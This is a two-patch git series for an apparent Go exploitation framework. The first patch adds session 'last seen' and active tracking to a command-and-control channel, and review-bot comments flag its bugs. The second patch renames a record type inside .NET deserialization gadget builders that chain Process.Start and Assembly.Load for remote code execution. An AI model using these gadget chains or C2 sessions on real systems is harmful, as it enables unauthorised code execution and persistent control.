From 915b429eefba51f35532d22c4e2177ced6207d8f Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Fri, 9 May 2025 11:05:28 -0600 Subject: [PATCH 1/2] Added a LastSeen value to session and added automatic updating of it. Also added an Active param to the Session struct and changed the logic to RemoveSession(s) functions to set this value to false instead of deleting it --- c2/channel/channel.go | 64 +++++++++++++++++++++++++++++++++++++------ c2/cli/basic.go | 7 +++++ 2 files changed, 63 insertions(+), 8 deletions(-) diff --git a/c2/channel/channel.go b/c2/channel/channel.go index 3e51a33..e22b324 100644 --- a/c2/channel/channel.go +++ b/c2/channel/channel.go @@ -31,6 +31,8 @@ type Session struct { RemoteAddr string ConnectionTime time.Time conn *net.Conn + Active bool + LastSeen time.Time } // HasSessions checks if a channel has any tracked sessions. This can be used to lookup if a C2 @@ -39,7 +41,13 @@ type Session struct { // c, ok := c2.GetInstance(conf.C2Type) // c.Channel().HasSessions() func (c *Channel) HasSessions() bool { - return len(c.Sessions) > 0 + for _, sess := range c.Sessions { + if sess.Active { + return true + } + } + + return false } // AddSession adds a remote connection for session tracking. If a network connection is being 
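Review bot: The two fields added to `Session` have no comments, and `Active` has a zero value of false, so a `Session` built anywhere other than `AddSession` would read as already removed. I would document both, e.g. `// Active is false once RemoveSession has closed the session; the entry stays in Sessions.` and `// LastSeen is set by AddSession and refreshed when data is read from the session.` The struct's opening lines are outside this hunk, so whether other code constructs `Session` literals cannot be confirmed from here.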
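Review bot: The doc comment above `HasSessions` still says it checks for any tracked session, while the new body reports only sessions with `Active` set. It should say so, e.g. `// HasSessions reports whether the channel has at least one active session.` The other guards in this file keep testing `len(c.Sessions) == 0` (visible in `RemoveSession`, `RemoveSessions` and the new `GetSessionIDByConn`), so after this change an empty channel is defined differently depending on which method is asked.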
@@ -65,11 +73,53 @@ func (c *Channel) AddSession(conn *net.Conn, addr string) bool { ConnectionTime: time.Now(), conn: conn, RemoteAddr: addr, + LastSeen: time.Now(), + Active: true, + } + + return true +} + +// Updates the LastSeen value for provided connection to the provided time +func (c *Channel) UpdateLastSeenByConn(conn net.Conn, timeStamp time.Time) bool { + id, ok := c.GetSessionIDByConn(conn) + if !ok { + return false + } + + session, ok := c.Sessions[id] + if !ok { + output.PrintFrameworkError("Session ID does not exist") + + return false } + session.LastSeen = timeStamp + c.Sessions[id] = session + return true } +// Returns the session ID that contains a given connection +func (c *Channel) GetSessionIDByConn(conn net.Conn) (string, bool) { + if len(c.Sessions) == 0 { + output.PrintFrameworkDebug("No sessions exist") + + return "", false + } + + for id, session := range c.Sessions { + if *session.conn == conn { + return id, true + } + } + + output.PrintFrameworkError("Conn does not exist in sessions") + + return "", false +} + + // RemoveSession removes a specific session ID and if a connection exists, closes it. func (c *Channel) RemoveSession(id string) bool { if len(c.Sessions) == 0 { @@ -77,7 +127,7 @@ func (c *Channel) RemoveSession(id string) bool { return false } - _, ok := c.Sessions[id] + session, ok := c.Sessions[id] if !ok { output.PrintFrameworkError("Session ID does not exist") @@ -86,7 +136,8 @@ func (c *Channel) RemoveSession(id string) bool { if c.Sessions[id].conn != nil { (*c.Sessions[id].conn).Close() } - delete(c.Sessions, id) + session.Active = false + c.Sessions[id] = session return true } @@ -98,11 +149,8 @@ func (c *Channel) RemoveSessions() bool { return false } - for k := range c.Sessions { - if c.Sessions[k].conn != nil { - (*c.Sessions[k].conn).Close() - } - delete(c.Sessions, k) + for id := range c.Sessions { + c.RemoveSession(id) } return true diff --git a/c2/cli/basic.go b/c2/cli/basic.go index 11d6c23..554bf8b 100644 
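Review bot: `GetSessionIDByConn` dereferences `session.conn` for every entry without a nil check, although `RemoveSession` guards the same pointer with `conn != nil`, so a single session stored with a nil conn would panic the lookup. Because removed sessions now stay in the map, the loop can also return the ID of a session whose connection was already closed. A guard such as `if session.conn != nil && session.Active && *session.conn == conn {` covers both cases. The doc comments on the two new functions should start with the function name, e.g. `// GetSessionIDByConn returns the ID of the session that holds conn.`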
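Review bot: `RemoveSession` no longer distinguishes a live session from one that was already removed: a second call closes the same connection again, discards the `Close` error, and still returns true. `RemoveSessions` (last hunk in this file) inherits this, since it calls `RemoveSession` for every key, and its `len(c.Sessions) == 0` guard now passes when only inactive entries remain. Returning early with `if !session.Active { return false }` right after the lookup, and closing through the local copy with `(*session.conn).Close()`, would keep the earlier contract. Entries are never deleted any more, so the map grows for the lifetime of the channel unless something outside this patch prunes it. `RemoveSession` starts above this hunk.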
--- a/c2/cli/basic.go +++ b/c2/cli/basic.go @@ -48,6 +48,13 @@ func backgroundResponse(ch *channel.Channel, wg *sync.WaitGroup, conn net.Conn, // could have move data to write, but the user has already called exit // below. I that that's tolerable for now. responseCh <- string(responseBuffer[:bytesRead]) + // Update "Last Seen" + ok := ch.UpdateLastSeenByConn(conn, time.Now()) + if !ok { + output.PrintFrameworkError("Failed to update LastSeen value for connection") + + return + } } time.Sleep(10 * time.Millisecond) } From 8d2a0c98ecfc9e25bc1f4a20dc4e4748154209f2 Mon Sep 17 00:00:00 2001 From: lobsterjerusalem Date: Fri, 24 Oct 2025 12:24:57 -0600 Subject: [PATCH 2/2] replaced confusing struct name --- dotnet/dotnetgadget.go | 138 ++++++++++++++++++------------------ dotnet/dotnetgadget_test.go | 2 +- dotnet/records.go | 12 ++-- 3 files changed, 76 insertions(+), 76 deletions(-) diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go index 3224263..c4e9606 100644 --- a/dotnet/dotnetgadget.go +++ b/dotnet/dotnetgadget.go @@ -166,7 +166,7 @@ func CreateAxHostStateDLL(dllBytes []byte, formatter string) (string, bool) { } } -// Serves a DLL in memory, used by CreateAxHostStateDLL +// Serves a DLL in memory, used by CreateAxHostStateDLL. func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { // This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one. var finalGadget string 
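Review bot: The added `return` ends the response-reading loop whenever the LastSeen bookkeeping fails, so a connection that is not found in `Sessions` loses its output after the first read. Logging and continuing looks safer, i.e. drop the `return` and keep the `output.PrintFrameworkError(...)` call. `GetSessionIDByConn` already prints its own error on a miss, so the same failure is reported twice. `UpdateLastSeenByConn` also writes to the `Sessions` map from this function, which takes a `*sync.WaitGroup` and presumably runs as a goroutine. No lock is visible in this patch and Go aborts the process on a concurrent map read and write, so the map access likely needs a mutex on `Channel`. `backgroundResponse` starts and ends outside the hunk.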
@@ -367,9 +367,9 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { }, MemberTypeInfo: ID15MemberTypeInfo, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, PrimitiveInt32(4), - BinaryObjectRecord{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}, + BinaryObjectString{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}, }, } records = append(records, systemClassWithMembersAndTypesID15) @@ -397,7 +397,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 17, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 37, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, 
@@ -430,7 +430,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 19, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 41, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, @@ -463,7 +463,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 21, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 45, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, @@ -496,7 +496,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 23, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 0x32, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]", }, 
@@ -529,12 +529,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 25, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 54, Value: "System.Web.UI.WebControls.PagedDataSource", }, 4, - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 55, Value: "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a", }, @@ -565,12 +565,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 27, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 57, Value: "System.ComponentModel.Design.DesignerVerb", }, 4, - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 58, Value: "System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", }, @@ -593,12 +593,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 29, MetadataID: 15, MemberValues: []any{ - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 61, Value: "System.Runtime.Remoting.Channels.AggregateDictionary", }, 4, - BinaryObjectRecord{ + BinaryObjectString{ ObjectID: 62, Value: "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", }, @@ -640,7 +640,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberCount: 2, }, Members: []any{ - BinaryObjectRecord{ObjectID: 65, Value: ""}, + BinaryObjectString{ObjectID: 65, Value: ""}, MemberReferenceRecord{IDRef: 65}, }, } 
@@ -755,12 +755,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { }, MemberTypeInfo: ID66MemberTypeInfo, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 80, Value: "System.Func`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 80, Value: "System.Func`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 62}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 62}, - BinaryObjectRecord{ObjectID: 82, Value: "System.Reflection.Assembly"}, - BinaryObjectRecord{ObjectID: 83, Value: "Load"}, + BinaryObjectString{ObjectID: 82, Value: "System.Reflection.Assembly"}, + BinaryObjectString{ObjectID: 83, Value: "Load"}, ObjectNullRecord{}, }, } @@ -789,8 +789,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 83}, MemberReferenceRecord{IDRef: 62}, MemberReferenceRecord{IDRef: 82}, - BinaryObjectRecord{ObjectID: 86, Value: "System.Reflection.Assembly Load(Byte[])"}, - BinaryObjectRecord{ObjectID: 87, Value: "System.Reflection.Assembly Load(System.Byte[])"}, + BinaryObjectString{ObjectID: 86, Value: "System.Reflection.Assembly Load(Byte[])"}, + BinaryObjectString{ObjectID: 87, Value: "System.Reflection.Assembly Load(System.Byte[])"}, 8, ObjectNullRecord{}, }, 
@@ -802,12 +802,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 68, MetadataID: 66, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 88, Value: "System.Func`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 88, Value: "System.Func`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 62}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 62}, MemberReferenceRecord{IDRef: 82}, - BinaryObjectRecord{ObjectID: 91, Value: "GetTypes"}, + BinaryObjectString{ObjectID: 91, Value: "GetTypes"}, ObjectNullRecord{}, }, } @@ -821,8 +821,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 91}, MemberReferenceRecord{IDRef: 62}, MemberReferenceRecord{IDRef: 82}, - BinaryObjectRecord{ObjectID: 94, Value: "System.Type[] GetTypes()"}, - BinaryObjectRecord{ObjectID: 95, Value: "System.Type[] GetTypes()"}, + BinaryObjectString{ObjectID: 94, Value: "System.Type[] GetTypes()"}, + BinaryObjectString{ObjectID: 95, Value: "System.Type[] GetTypes()"}, 8, // Corresponds with Val6 of the referenced object ObjectNullRecord{}, }, 
@@ -834,12 +834,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 70, MetadataID: 66, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 96, Value: "System.Func`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 96, Value: "System.Func`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 62}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 62}, - BinaryObjectRecord{ObjectID: 98, Value: "System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, - BinaryObjectRecord{ObjectID: 99, Value: "GetEnumerator"}, + BinaryObjectString{ObjectID: 98, Value: "System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 99, Value: "GetEnumerator"}, ObjectNullRecord{}, }, } 
@@ -853,8 +853,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x63}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x62}, - BinaryObjectRecord{ObjectID: 0x66, Value: "System.Collections.Generic.IEnumerator`1[System.Type] GetEnumerator()"}, - BinaryObjectRecord{ObjectID: 0x67, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] GetEnumerator()"}, + BinaryObjectString{ObjectID: 0x66, Value: "System.Collections.Generic.IEnumerator`1[System.Type] GetEnumerator()"}, + BinaryObjectString{ObjectID: 0x67, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] GetEnumerator()"}, 8, // Corresponds with referenced, like classWithID18 ObjectNullRecord{}, }, 
@@ -866,12 +866,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x48, MetadataID: 0x42, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x68, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x68, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 0x3e}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 0x3e}, - BinaryObjectRecord{ObjectID: 0x6a, Value: "System.Collections.IEnumerator"}, - BinaryObjectRecord{ObjectID: 0x6b, Value: "MoveNext"}, + BinaryObjectString{ObjectID: 0x6a, Value: "System.Collections.IEnumerator"}, + BinaryObjectString{ObjectID: 0x6b, Value: "MoveNext"}, ObjectNullRecord{}, }, } @@ -885,8 +885,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x6b}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x6a}, - BinaryObjectRecord{ObjectID: 0x6e, Value: "Boolean MoveNext()"}, - BinaryObjectRecord{ObjectID: 0x6f, Value: "System.Boolean MoveNext()"}, + BinaryObjectString{ObjectID: 0x6e, Value: "Boolean MoveNext()"}, + BinaryObjectString{ObjectID: 0x6f, Value: "System.Boolean MoveNext()"}, 8, // Corresponds with referenced, like classWithID18 ObjectNullRecord{}, }, 
@@ -898,12 +898,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x4a, MetadataID: 0x42, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x70, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x70, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 0x3e}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 0x3e}, - BinaryObjectRecord{ObjectID: 0x72, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, - BinaryObjectRecord{ObjectID: 0x73, Value: "get_Current"}, + BinaryObjectString{ObjectID: 0x72, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x73, Value: "get_Current"}, ObjectNullRecord{}, }, } 
@@ -917,8 +917,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x73}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x72}, - BinaryObjectRecord{ObjectID: 0x76, Value: "System.Type get_Current()"}, - BinaryObjectRecord{ObjectID: 0x77, Value: "System.Type get_Current()"}, + BinaryObjectString{ObjectID: 0x76, Value: "System.Type get_Current()"}, + BinaryObjectString{ObjectID: 0x77, Value: "System.Type get_Current()"}, 8, ObjectNullRecord{}, }, @@ -930,12 +930,12 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x4c, MetadataID: 0x42, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x78, Value: "System.Func`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, + BinaryObjectString{ObjectID: 0x78, Value: "System.Func`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"}, MemberReferenceRecord{IDRef: 0x3e}, ObjectNullRecord{}, MemberReferenceRecord{IDRef: 0x3e}, - BinaryObjectRecord{ObjectID: 0x7a, Value: "System.Activator"}, - BinaryObjectRecord{ObjectID: 0x7b, Value: "CreateInstance"}, + BinaryObjectString{ObjectID: 0x7a, Value: "System.Activator"}, + BinaryObjectString{ObjectID: 0x7b, Value: "CreateInstance"}, ObjectNullRecord{}, }, } 
@@ -949,8 +949,8 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { MemberReferenceRecord{IDRef: 0x7b}, MemberReferenceRecord{IDRef: 0x3e}, MemberReferenceRecord{IDRef: 0x7a}, - BinaryObjectRecord{ObjectID: 0x7e, Value: "System.Object CreateInstance(System.Type)"}, - BinaryObjectRecord{ObjectID: 0x7f, Value: "System.Object CreateInstance(System.Type)"}, + BinaryObjectString{ObjectID: 0x7e, Value: "System.Object CreateInstance(System.Type)"}, + BinaryObjectString{ObjectID: 0x7f, Value: "System.Object CreateInstance(System.Type)"}, 8, ObjectNullRecord{}, }, @@ -962,7 +962,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) { ObjectID: 0x4e, MetadataID: 0xf, MemberValues: []any{ - BinaryObjectRecord{ObjectID: 0x80, Value: "System.ComponentModel.Design.CommandID"}, + BinaryObjectString{ObjectID: 0x80, Value: "System.ComponentModel.Design.CommandID"}, 4, MemberReferenceRecord{IDRef: 0x3a}, }, @@ -1099,8 +1099,8 @@ func CreateDataSetXMLDiffGram(payloadIn string) (string, bool) { "String", "String", } - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 3, Value: string0}) - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4, Value: string1}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 3, Value: string0}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 4, Value: string1}) classInfo := ClassInfo{ObjectID: 1, Name: className, MemberCount: len(memberNames), MemberNames: memberNames} memberTypeInfo, ok := getMemberTypeInfo(memberTypes, memberNames, additionalInfo) if !ok { 
@@ -1141,7 +1141,7 @@ func CreateTextFormattingRunProperties(program string, args string, formatter st return "", false } serializationHeaderRecord := SerializationHeaderRecord{RootID: 1, HeaderID: -1} - binaryObject := BinaryObjectRecord{ObjectID: 3, Value: xmlData} + binaryObject := BinaryObjectString{ObjectID: 3, Value: xmlData} var memberValues []any memberValues = append(memberValues, binaryObject) @@ -1251,7 +1251,7 @@ func CreateDataSet(program string, args string, formatter string) (string, bool) // Finish creating the OUTER classWithMembersAndTypes using the innerClassWithMembersAndTypes as a member memberValues = append(memberValues, innerClassWithMembersAndTypes) - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 4}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 4}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 4}) memberValues = append(memberValues, false) 
@@ -1360,12 +1360,12 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s var obj8additionalInfo []any obj8additionalInfo = append(obj8additionalInfo, "System.DelegateSerializationHolder+DelegateEntry") var obj8MemberValues []any - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 11, Value: fmt.Sprintf("System.Func`3[[%s],[%s],[%s]]", mscorlibSystemString, mscorlibSystemString, systemlibSystemDiagString)}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 12, Value: mscorlibString}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 11, Value: fmt.Sprintf("System.Func`3[[%s],[%s],[%s]]", mscorlibSystemString, mscorlibSystemString, systemlibSystemDiagString)}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 12, Value: mscorlibString}) obj8MemberValues = append(obj8MemberValues, ObjectNullRecord{}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 13, Value: systemlibString}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 14, Value: "System.Diagnostics.Process"}) - obj8MemberValues = append(obj8MemberValues, BinaryObjectRecord{ObjectID: 15, Value: "Start"}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 13, Value: systemlibString}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 14, Value: "System.Diagnostics.Process"}) + obj8MemberValues = append(obj8MemberValues, BinaryObjectString{ObjectID: 15, Value: "Start"}) obj8MemberValues = append(obj8MemberValues, MemberReferenceRecord{IDRef: 16}) obj8ClassInfo := ClassInfo{ 
@@ -1395,8 +1395,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 15}) obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 13}) obj9MemberValues = append(obj9MemberValues, MemberReferenceRecord{IDRef: 14}) - obj9MemberValues = append(obj9MemberValues, BinaryObjectRecord{ObjectID: 20, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) - obj9MemberValues = append(obj9MemberValues, BinaryObjectRecord{ObjectID: 21, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) + obj9MemberValues = append(obj9MemberValues, BinaryObjectString{ObjectID: 20, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) + obj9MemberValues = append(obj9MemberValues, BinaryObjectString{ObjectID: 21, Value: "System.Diagnostics.Process Start(System.String, System.String)"}) obj9MemberValues = append(obj9MemberValues, 8) obj9MemberValues = append(obj9MemberValues, ObjectNullRecord{}) @@ -1477,8 +1477,8 @@ func CreateTypeConfuseDelegate(program string, args string, formatter string) (s // Create arraySinglePrimitiveRecord to append before the end var arraySingleStringMembers []any - arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectRecord{ObjectID: 6, Value: args}) - arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectRecord{ObjectID: 7, Value: program}) + arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectString{ObjectID: 6, Value: args}) + arraySingleStringMembers = append(arraySingleStringMembers, BinaryObjectString{ObjectID: 7, Value: program}) arraySingleStringRecord := ArraySingleStringRecord{ ArrayInfo: ArrayInfo{ObjectID: 4, MemberCount: 2}, Members: arraySingleStringMembers, 
